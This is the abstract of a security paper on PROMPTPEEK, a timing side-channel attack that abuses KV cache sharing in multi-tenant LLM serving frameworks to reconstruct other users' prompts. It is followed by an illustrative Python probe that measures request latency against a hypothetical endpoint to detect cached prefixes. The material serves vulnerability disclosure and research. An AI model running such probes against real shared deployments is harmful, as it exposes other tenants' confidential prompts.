Guanlong Wu (Southern University of Science and Technology), Zheng Zhang (ByteDance Inc.), Yao Zhang (ByteDance Inc.), Weili Wang (Southern University of Science and Technology), Jianyu Niu (Southern University of Science and Technology), Ye Wu (ByteDance Inc.), Yinqian Zhang (Southern University of Science and Technology (SUSTech))

Large Language Models (LLMs), which laid the groundwork for Artificial General Intelligence (AGI), have recently gained significant traction in academia and industry due to their disruptive applications. To enable scalable applications and efficient resource management, various multi-tenant LLM serving frameworks have been proposed, in which the LLM caters to the needs of multiple users simultaneously. One notable mechanism in recent works, such as SGLang and vLLM, is sharing the Key-Value (KV) cache for identical token sequences among multiple users, saving both memory and computation. This paper presents the first investigation into the security risks associated with multi-tenant LLM serving. We show that the state-of-the-art mechanisms of KV cache sharing may lead to new side-channel attack vectors, allowing unauthorized reconstruction of user prompts and compromising sensitive user information among mutually distrustful users. Specifically, we introduce our attack, PROMPTPEEK, and apply it to three scenarios in which the adversary, with varying degrees of prior knowledge, is capable of reverse-engineering prompts from other users. This study underscores the need for careful resource management in multi-tenant LLM serving and provides critical insights for future security enhancement.
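The core observation behind such an attack can be illustrated with a minimal timing probe: when a serving framework reuses the KV cache for a prefix that another tenant has already submitted, the prefill work for that prefix is skipped and the request returns measurably faster. The sketch below is purely illustrative and is not the PROMPTPEEK implementation; the endpoint URL, model name, and latency threshold are assumptions, and it targets a generic OpenAI-compatible completions API rather than any specific deployment.

```python
import time
import requests

# Hypothetical OpenAI-compatible endpoint of a shared vLLM/SGLang deployment.
# The URL, model name, and threshold are illustrative assumptions.
ENDPOINT = "http://serving-host:8000/v1/completions"
MODEL = "shared-llm"
HIT_THRESHOLD_S = 0.05  # assumed latency gap between cached and uncached prefill


def time_to_first_token(prompt: str) -> float:
    """Send a 1-token completion request and measure its wall-clock latency.

    If the framework reuses a KV cache entry for this prefix (because another
    tenant already submitted it), prefill for the shared part is skipped and
    the request completes faster.
    """
    start = time.monotonic()
    requests.post(
        ENDPOINT,
        json={"model": MODEL, "prompt": prompt, "max_tokens": 1},
        timeout=30,
    )
    return time.monotonic() - start


def probe_prefix(known_prefix: str, candidates: list[str]) -> str | None:
    """Guess which candidate extension of a known prefix is already cached.

    A candidate whose latency falls clearly below the uncached baseline is
    likely part of another user's prompt, i.e., its KV cache entry exists.
    """
    baseline = time_to_first_token(known_prefix + " <uncached-filler>")
    for candidate in candidates:
        latency = time_to_first_token(known_prefix + candidate)
        if baseline - latency > HIT_THRESHOLD_S:
            return candidate  # cache hit: likely matches the victim's prompt
    return None
```

By iterating this probe token by token, an adversary with partial knowledge of a victim's prompt could, in principle, extend the recovered prefix step by step; the paper's three scenarios differ in how much prior knowledge the adversary starts with.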
